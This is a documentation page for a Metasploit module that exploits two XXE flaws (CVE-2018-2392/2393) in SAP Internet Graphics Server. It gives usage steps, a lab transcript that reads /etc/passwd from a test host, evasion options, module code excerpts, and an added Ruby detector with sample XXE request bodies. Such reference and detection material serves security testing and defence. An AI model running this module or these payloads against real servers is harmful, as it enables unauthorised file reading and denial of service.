SAP Internet Graphics Server (IGS) XMLCHART XXE - Metasploit


This page contains detailed information about how to use the auxiliary/admin/sap/sap_igs_xmlchart_xxe Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: SAP Internet Graphics Server (IGS) XMLCHART XXE
Module: auxiliary/admin/sap/sap_igs_xmlchart_xxe
Source code: modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
Disclosure date: 2018-03-14
Last modification time: 2021-05-13 04:01:03 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 40080
List of CVEs: CVE-2018-2392, CVE-2018-2393

This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user from which the IGS service is started, which will typically be the SAP admin user. Alternatively, attackers can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable SAP IGS server.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf auxiliary(sap_igs_xmlchart_xxe) > show targets
    ... a list of targets ...
msf auxiliary(sap_igs_xmlchart_xxe) > set TARGET target-id
msf auxiliary(sap_igs_xmlchart_xxe) > show options
    ... show and set options ...
msf auxiliary(sap_igs_xmlchart_xxe) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.

Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user from which the IGS service is started, which will typically be the SAP admin user. Alternatively, attackers can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable SAP IGS server.

Application Background

The Internet Graphics Service (IGS) provides infrastructure that enables developers to display graphics in an internet browser with minimal effort. It has been integrated into several SAP UI technologies, where it allows data from another SAP system or data source to be used to generate dynamic graphical or non-graphical output.

Installation Steps

Steps to install and update the SAP IGS server can be found online on this page. Additional information on configuring the IGS server can be found here. Finally, information on administering the IGS server can be found here.

Once set up and configured, the instances will be vulnerable on the default HTTP port 40080.
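The module works by POSTing XML to the XMLCHART page (by default on port 40080, under whatever prefix URIPATH points at) with an external entity declaration that the IGS parser resolves. From the defender's side, that precondition is what to look for in request logs or a WAF: an XMLCHART POST whose body declares an external (SYSTEM/PUBLIC) or parameter entity. The following Ruby is an added example written for this page; it is not code from the Metasploit module or from SAP. The sample requests, the boundary and form-field names, and the `/igs/` prefix are constructed for illustration; the detector only keys on the request path suffix and the entity declarations, so it is independent of the chart XML itself.

```ruby
# Added example, not part of the Metasploit module: flag HTTP POST requests
# to an SAP IGS XMLCHART endpoint whose XML body declares external entities,
# the precondition for the XXE in CVE-2018-2392 / CVE-2018-2393.

# Request line of a POST whose path ends in /XMLCHART, with or without a
# prefix such as /igs/ (the URIPATH option) and an optional query string.
XMLCHART_POST = %r{\APOST\s+(?<path>\S*/XMLCHART)(?:\?\S*)?\s+HTTP/1\.[01]}i

# An entity declaration (general or parameter) with a SYSTEM or PUBLIC
# identifier: the document asks the parser to fetch external content.
EXTERNAL_ENTITY = /<!ENTITY\s+(?:%\s*)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b/im
# A parameter entity; used to pull in an external DTD for out-of-band XXE.
PARAMETER_ENTITY = /<!ENTITY\s+%/im

# Split a raw HTTP request into its request line and body (headers skipped).
def split_request(raw)
  head, _sep, body = raw.partition(/\r?\n\r?\n/)
  [head.lines.first.to_s.strip, body]
end

# nil when the request is not an XMLCHART POST; otherwise the matched path
# plus a verdict of :xxe_indicator or :benign.
def classify_request(raw)
  request_line, body = split_request(raw)
  m = XMLCHART_POST.match(request_line)
  return nil unless m

  suspicious = EXTERNAL_ENTITY.match?(body) || PARAMETER_ENTITY.match?(body)
  { path: m[:path], verdict: suspicious ? :xxe_indicator : :benign }
end

# Run the classifier over raw requests and keep only the findings.
def scan_requests(requests)
  requests.filter_map do |raw|
    result = classify_request(raw)
    result if result && result[:verdict] == :xxe_indicator
  end
end

# Constructed sample requests (host, boundary and chart XML are made up).
HDR = "Host: igs.example.test:40080\r\nContent-Type: multipart/form-data; boundary=b1\r\n\r\n"
PART = "--b1\r\nContent-Disposition: form-data; name=\"chart\"\r\n\r\n"
SAMPLE_REQUESTS = [
  # Ordinary chart request: no DOCTYPE at all.
  "POST /XMLCHART HTTP/1.1\r\n" + HDR + PART +
    "<?xml version=\"1.0\"?><chart><title>Sales</title></chart>\r\n--b1--\r\n",
  # External general entity with a placeholder file URI.
  "POST /XMLCHART HTTP/1.1\r\n" + HDR + PART +
    "<?xml version=\"1.0\"?><!DOCTYPE chart [<!ENTITY x SYSTEM \"file:///example/file\">]>" \
    "<chart><title>&x;</title></chart>\r\n--b1--\r\n",
  # Internal entity only: a DTD, but nothing external, so not flagged.
  "POST /XMLCHART HTTP/1.1\r\n" + HDR + PART +
    "<?xml version=\"1.0\"?><!DOCTYPE chart [<!ENTITY greeting \"hi\">]>" \
    "<chart><title>&greeting;</title></chart>\r\n--b1--\r\n",
  # Parameter entity pointing at a placeholder external DTD, non-default path.
  "POST /igs/XMLCHART HTTP/1.1\r\n" + HDR + PART +
    "<?xml version=\"1.0\"?><!DOCTYPE chart [<!ENTITY % ext SYSTEM \"http://dtd.example.test/x.dtd\"> %ext;]>" \
    "<chart/>\r\n--b1--\r\n",
  # GET to the same page: not a chart submission, ignored by the detector.
  "GET /XMLCHART HTTP/1.1\r\nHost: igs.example.test:40080\r\n\r\n"
]

if __FILE__ == $PROGRAM_NAME
  scan_requests(SAMPLE_REQUESTS).each do |f|
    puts "XXE indicator in POST to #{f[:path]}"
  end
end
```

Matching on the path suffix rather than the literal `/XMLCHART` keeps the rule valid when IGS is installed under a prefix, and the internal-entity sample shows the rule does not fire on every DTD, only on declarations that name an external identifier or parameter entity.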

Verification Steps


  1. Start msfconsole
  2. Do: workspace [WORKSPACE]
  3. Do: use auxiliary/admin/sap/sap_igs_xmlchart_xxe
  4. Do: set RHOSTS [IP]
  5. Do: set FILE [remote file name]
  6. Do: set action READ
  7. Do: check
  8. Verify that the check method correctly identifies if the target is vulnerable or not.
  9. Do: run
  10. Verify that the contents of the file you specified were returned.

Options


FILE

File to read from the remote server. Example: /etc/passwd

URIPATH

This is the path to the XMLCHART page of the SAP IGS server that is vulnerable to XXE. By default it is set to /XMLCHART, however it can be changed if the SAP IGS server was installed under a different path than the web root. For example, if the SAP IGS server was installed to the /igs/ path under the web root, then this value would be set to /igs/XMLCHART.

Actions


   Name  Description
   ----  -----------
   READ  Remote file read
   DOS   Denial Of Service

Scenarios


Vulnerable SAP IGS release: 7.45 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          no        File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT    40080                yes       The target port (TCP)
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29

[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                             References
---------                ----          ----                                             ----------
2020-10-07 10:12:37 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot

Loot
====

host          service  type              name         content     info                  path
----          -------  ----              ----         -------     ----                  ----
172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt


Msfconsole Usage


Here is how the admin/sap/sap_igs_xmlchart_xxe auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show info

       Name: SAP Internet Graphics Server (IGS) XMLCHART XXE
     Module: auxiliary/admin/sap/sap_igs_xmlchart_xxe
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-03-14

Provided by:
  Yvan Genuer
  Vladimir Ivanov

Available actions:
  Name  Description
  ----  -----------
  DOS   Denial Of Service
  READ  Remote file read

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FILE     /etc/passwd      no        File to read from the remote server
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    40080            yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  URIPATH  /XMLCHART        yes       Path to the SAP IGS XMLCHART page from the web root
  VHOST                     no        HTTP server virtual host

Description:
  This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE 
  vulnerabilities within the XMLCHART page of SAP Internet Graphics 
  Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. 
  These vulnerabilities occur due to a lack of appropriate validation 
  on the Extension HTML tag when submitting a POST request to the 
  XMLCHART page to generate a new chart. Successful exploitation will 
  allow unauthenticated remote attackers to read files from the server 
  as the user from which the IGS service is started, which will 
  typically be the SAP admin user. Alternatively attackers can also 
  abuse the XXE vulnerability to conduct a denial of service attack 
  against the vulnerable SAP IGS server.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-2392
  https://nvd.nist.gov/vuln/detail/CVE-2018-2393
  https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

Module Options


This is a complete list of options available in the admin/sap/sap_igs_xmlchart_xxe auxiliary module:

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FILE     /etc/passwd      no        File to read from the remote server
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080            yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART        yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                     no        HTTP server virtual host

Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read

Advanced Options


Here is a complete list of advanced options supported by the admin/sap/sap_igs_xmlchart_xxe auxiliary module:

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show advanced

Module advanced options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/sap/sap_igs_xmlchart_xxe module can do:

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   DOS   Denial Of Service
   READ  Remote file read

Evasion Options


Here is the full list of possible evasion options supported by the admin/sap/sap_igs_xmlchart_xxe auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>


Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>" error message:

164:	          'ctype' => "multipart/form-data; boundary=#{@post_data.bound}",
165:	          'data' => @post_data.to_s
166:	        }
167:	      )
168:	    rescue StandardError => e
169:	      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
170:	      vprint_error("Error #{e.class}: #{e}")
171:	      return -1
172:	    end
173:	
174:	    # Check first HTTP response

Error <E.CLASS>: <E>


Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:

165:	          'data' => @post_data.to_s
166:	        }
167:	      )
168:	    rescue StandardError => e
169:	      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
170:	      vprint_error("Error #{e.class}: #{e}")
171:	      return -1
172:	    end
173:	
174:	    # Check first HTTP response
175:	    if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)

Picture


Here is a relevant code snippet related to the "Picture" error message:

170:	      vprint_error("Error #{e.class}: #{e}")
171:	      return -1
172:	    end
173:	
174:	    # Check first HTTP response
175:	    if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
176:	      return -2
177:	    end
178:	
179:	    if first_response.body.include?('Errors')
180:	      return -3

Errors


Here is a relevant code snippet related to the "Errors" error message:

174:	    # Check first HTTP response
175:	    if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
176:	      return -2
177:	    end
178:	
179:	    if first_response.body.include?('Errors')
180:	      return -3
181:	    end
182:	
183:	    first_response
184:	  end

Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>


Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>" error message:

195:	            'uri' => normalize_uri(@download_link),
196:	            'method' => 'GET'
197:	          }
198:	        )
199:	      rescue StandardError => e
200:	        print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@download_link}")
201:	        vprint_error("Error #{e.class}: #{e}")
202:	        return -1 # Some exception was thrown whilst making the second HTTP request!
203:	      end
204:	
205:	      # Check second HTTP response

Error <E.CLASS>: <E>


Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:

196:	            'method' => 'GET'
197:	          }
198:	        )
199:	      rescue StandardError => e
200:	        print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@download_link}")
201:	        vprint_error("Error #{e.class}: #{e}")
202:	        return -1 # Some exception was thrown whilst making the second HTTP request!
203:	      end
204:	
205:	      # Check second HTTP response
206:	      if second_response.nil? || second_response.code != 200 || !second_response.body.include?('area shape=rect')

The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.


Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the first request and did not respond in the expected manner." error message:

225:	    # so that the module can check if the target is vulnerable or not.
226:	
227:	    # Get OS release information
228:	    check_response = send_first_request
229:	    if check_response == -1
230:	      Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231:	    elsif check_response == -2
232:	      Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233:	    else
234:	      if check_response == -3
235:	        vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")

The server sent a response but it was not in the expected format. The target is likely patched.


Here is a relevant code snippet related to the "The server sent a response but it was not in the expected format. The target is likely patched." error message:

227:	    # Get OS release information
228:	    check_response = send_first_request
229:	    if check_response == -1
230:	      Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231:	    elsif check_response == -2
232:	      Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233:	    else
234:	      if check_response == -3
235:	        vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
236:	      else
237:	        result = analyze_first_response(check_response.body)

The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights.


Here is a relevant code snippet related to the "The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights." error message:

230:	      Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231:	    elsif check_response == -2
232:	      Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233:	    else
234:	      if check_response == -3
235:	        vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
236:	      else
237:	        result = analyze_first_response(check_response.body)
238:	
239:	        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240:	        if result == -1 || result == -3

The server did not respond to the second request in the expected manner and is therefore safe


Here is a relevant code snippet related to the "The server did not respond to the second request in the expected manner and is therefore safe" error message:

236:	      else
237:	        result = analyze_first_response(check_response.body)
238:	
239:	        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240:	        if result == -1 || result == -3
241:	          Exploit::CheckCode::Safe('The server did not respond to the second request in the expected manner and is therefore safe')
242:	        elsif result == -2
243:	          Exploit::CheckCode::Unknown('Some connection error occurred and it was not possible to determine if the server is vulnerable or not')
244:	        end
245:	
246:	        if !@file_content.to_s.empty?

Some connection error occurred and it was not possible to determine if the server is vulnerable or not


Here is a relevant code snippet related to the "Some connection error occurred and it was not possible to determine if the server is vulnerable or not" error message:

238:	
239:	        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240:	        if result == -1 || result == -3
241:	          Exploit::CheckCode::Safe('The server did not respond to the second request in the expected manner and is therefore safe')
242:	        elsif result == -2
243:	          Exploit::CheckCode::Unknown('Some connection error occurred and it was not possible to determine if the server is vulnerable or not')
244:	        end
245:	
246:	        if !@file_content.to_s.empty?
247:	          if (os_regex = @file_content.match(/^PRETTY_NAME.*=.*"(?<os>.*)"$/))
248:	            os_release = "OS: #{os_regex[:os]}"

<HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched.


Here is a relevant code snippet related to the "<HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched." error message:

246:	        if !@file_content.to_s.empty?
247:	          if (os_regex = @file_content.match(/^PRETTY_NAME.*=.*"(?<os>.*)"$/))
248:	            os_release = "OS: #{os_regex[:os]}"
249:	          end
250:	        else
251:	          return Exploit::CheckCode::Safe("#{@host} did not return the contents of the requested file, aka #{os_release_file}. This host is likely patched.")
252:	        end
253:	      end
254:	      # Make ident
255:	      if os_release != ''
256:	        ident = "SAP Internet Graphics Server (IGS); #{os_release}"

<HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!


Here is a relevant code snippet related to the "<HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!" error message:

272:	        refs: references,
273:	        info: os_release
274:	      )
275:	      # Print Vulnerability
276:	      if os_release == ''
277:	        Exploit::CheckCode::Vulnerable("#{@host} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
278:	      else
279:	        Exploit::CheckCode::Vulnerable("#{@host} running #{os_release} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
280:	      end
281:	    end
282:	  end

<HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!


Here is a relevant code snippet related to the "<HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!" error message:

274:	      )
275:	      # Print Vulnerability
276:	      if os_release == ''
277:	        Exploit::CheckCode::Vulnerable("#{@host} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
278:	      else
279:	        Exploit::CheckCode::Vulnerable("#{@host} running #{os_release} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
280:	      end
281:	    end
282:	  end
283:	
284:	  def run

The action <ACTION.NAME> is not a supported action.


Here is a relevant code snippet related to the "The action <ACTION.NAME> is not a supported action." error message:

286:	    when 'READ'
287:	      action_file_read
288:	    when 'DOS'
289:	      action_dos
290:	    else
291:	      print_error("The action #{action.name} is not a supported action.")
292:	    end
293:	  end
294:	
295:	  def action_file_read
296:	    # Set up XML data for HTTP request

The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.


Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the first request and did not respond in the expected manner." error message:

298:	    make_post_data(@file, dos: false)
299:	
300:	    # Download remote file
301:	    first_response = send_first_request
302:	    if first_response == -1
303:	      fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
304:	    elsif first_response == -2
305:	      fail_with(Failure::UnexpectedReply, 'The server sent a response but it was not in the expected format. The target is likely patched.')
306:	    else
307:	      # Report Service and Vulnerability
308:	      report_service(

The server sent a response but it was not in the expected format. The target is likely patched.


Here is a relevant code snippet related to the "The server sent a response but it was not in the expected format. The target is likely patched." error message:

300:	    # Download remote file
301:	    first_response = send_first_request
302:	    if first_response == -1
303:	      fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
304:	    elsif first_response == -2
305:	      fail_with(Failure::UnexpectedReply, 'The server sent a response but it was not in the expected format. The target is likely patched.')
306:	    else
307:	      # Report Service and Vulnerability
308:	      report_service(
309:	        host: @host,
310:	        port: @port,

The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights.


Here is a relevant code snippet related to the "The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights." error message:

        name: name,
        refs: references
      )
      # Get remote file content
      if first_response == -3
        print_status("The SAP IGS server is vulnerable, but file: #{@file} not found or not enough rights.")
      else
        result = analyze_first_response(first_response.body)
        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
        if result == -1
          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')

The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.


Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the second request and did not respond in the expected manner." error message:

        print_status("The SAP IGS server is vulnerable, but file: #{@file} not found or not enough rights.")
      else
        result = analyze_first_response(first_response.body)
        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
        if result == -1
          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
        elsif result == -2
          print_error('The server responded successfully but the response indicated the server is not vulnerable!')
          return
        elsif result == -3
          print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')

The server responded successfully but the response indicated the server is not vulnerable!


Here is a relevant code snippet related to the "The server responded successfully but the response indicated the server is not vulnerable!" error message:

        result = analyze_first_response(first_response.body)
